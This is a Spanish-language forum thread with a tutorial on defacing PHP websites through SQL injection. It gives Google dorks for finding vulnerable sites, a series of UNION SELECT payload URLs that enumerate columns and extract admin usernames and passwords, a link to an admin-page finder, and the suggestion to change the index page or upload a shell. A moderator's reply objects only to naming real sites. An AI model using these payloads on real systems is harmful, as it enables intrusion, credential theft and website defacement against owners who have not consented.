Título: Tutorial sql injection Publicado por: abdelhaklashab en 2 Diciembre 2009, 02:41 am Tutorial Sql Injection Version 4 Por: abdelhaklashab En este manual aprenderemos a defacear una web .php por el método sql injection versión 4 Primero tenemos que buscar una web que sea vulnerable podemos utilizar estos dorks para uscar en goolge: inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurllay_old.php?id= inurl:declaration_more.php?decl_id= inurlageid= inurl:games.php?id= inurlage.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php?id= inurl:staff_id= 2-bien aqui tenemos una web vulnerable http://www.ejemplo.com/category.php?id=48 3- para saber si es vulnerbale borramos los números del final del link y ponemos una ‘ De modo que quede asi http://www.ejemplo.com/category.php?id=’ si al hacer eso nos sale un error tipo asin Error in query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND valid = '1' order by c_id' at line 1 bien ahora lo que haremos es buscar las columnas que tienen error si no sale el error borramos el ‘ de mode que quede asi http://www.ejemplo.com/category.php?id= y ponemos -1+order+by+100— al fianl del link de modo que quede asi http://www.ejemplo.com/category.php?id=1-order+by+100— nos saldrá un error tipo asi /column '100' in 'order clause' ahora lo que haremos será bajar de poco en poco hasta ver el numero donde no sale ese error pa que me entiendan hay que hacer esto http://www.ejemplo.com/category.php?id=-1+order+by+100-- sale el error bajamos 10 numero http://www.ejemplo.com/category.php?id=-1+order+by+90-- nos sigue saliendo el error volvemos a bajar http://www.ejemplo.com/category.php?id=-1+order+by+80-- vamos bajarndo hasta que desaparesca el error en este caso http://www.ejemplo.com/category.php?id=-1+order+by+15-- aki desaparece el error bien ahora sabemos que hay 15 columnas con error lo que tenemos que hacer ahora es http://www.ejemplo.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- si en otro caso por ejemplo es 9 collumnas errores www.example.es/categort.php?=-1+union+select+1,2,3,4,5,6,7,8,9-- bueno volvemos a nuestra web http://www.ejemplo.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- damos a enter nos saldrán en la pagina unos números en este caso el 1,9,6 estos son las columnas que podemos utilizar bien nosotros utilizaremos el 9 http://www.ejemplo.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,version(),10,11,12,13,14,15-- vamos al numero 9 y ponemos versión() http://www.ejemplo.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- nos saldrá 4.1.20-community-nt Bien ahora lo que tenemos que hacer es esto Vlvemos el link a su estado osea quitamos eso de versión() Y volvemos a poner el 9 Antes http://www.ejemplo.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- ahora que quede asi http://www.ejemplo.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- bien el siguiente paso hacemos esto http://www.ejemplo.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15+from+admin-- este link lo que ara es darnos el nombre de usuario pones +from+admin lo k utilizamos es (admin) bien en este caso nos da error bien ahora camiams admin por usuario de modo que quede asi from+usuario http://www.ejemplo.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15+from+usuario-- bien si en este caso nos da error vamos probando nombres hasta dar con uno posibles nombres admin,user,usuario,username,login,administradr,administrator……. Depende de su imaginación En este caso es admin http://www.ejemplo.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15+from+admin-- bien no nos sale ningún nombre ni nungun error asi que el usuario es admin por defecto ahora vamos a buscar la contraseña os recordais de las columnas que tenían error el 9,1,6 bien en estas columnas buscamos el pass nosotros utilizaremos el 9 como siempre también probaremos con password,pass,contraseña,apass,entrada,loginpass,passw,passwo….vamos al 9 y vamos probando http://www.ejemplo.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,password,10,11,12,13,14,15+from+admin-- nos da error vamos probando en este caso es apass http://www.ejemplo.com/category.php?id=-1+union+select+1,2,3,4,5,6,7,8,apass,10,11,12,13,14,15+from+admin-- bien ya tenemos el admin y el pass admin:admin contraseña: gigio2001 ya tenemos lo básico ahora falta lo mas importante de todo la pagina de administración normalmente suele ser /admin /administrador Vamos probando pero lo mas rápido Es entrar aquí http://mormoroth.net/af/ Ponemos la pagina web y nos dara la agina de administración Ahora lo tenemos todo En este caso es admin http://www.ejemplo.com/admin/ ponemos el pass y admin y a disfrutar cambiamos el index , modificamos lo que queramos o subimos la Shell……….infinidad de opciones. Esto es todo si teneis alguna duda enviarme un mp o dejar el comentario Por:abdelhaklashab Título: Re: Tutorial sql injection Publicado por: WHK en 2 Diciembre 2009, 04:32 am Hola, genial pero recuerda leer las reglas primero antes de crear post, no puedes ir publicando sitios webs externos con vulnerabilidades, lo que si puedes hacer es dar ejemplos o hacer tu publicación con un sitio web que sea algo mas público y no tan personal para evitar problemas con sus dueños.
Saludos. PD: el post duplicado en el foro de bugs y exploits ya lo eliminé dejando solamente este. |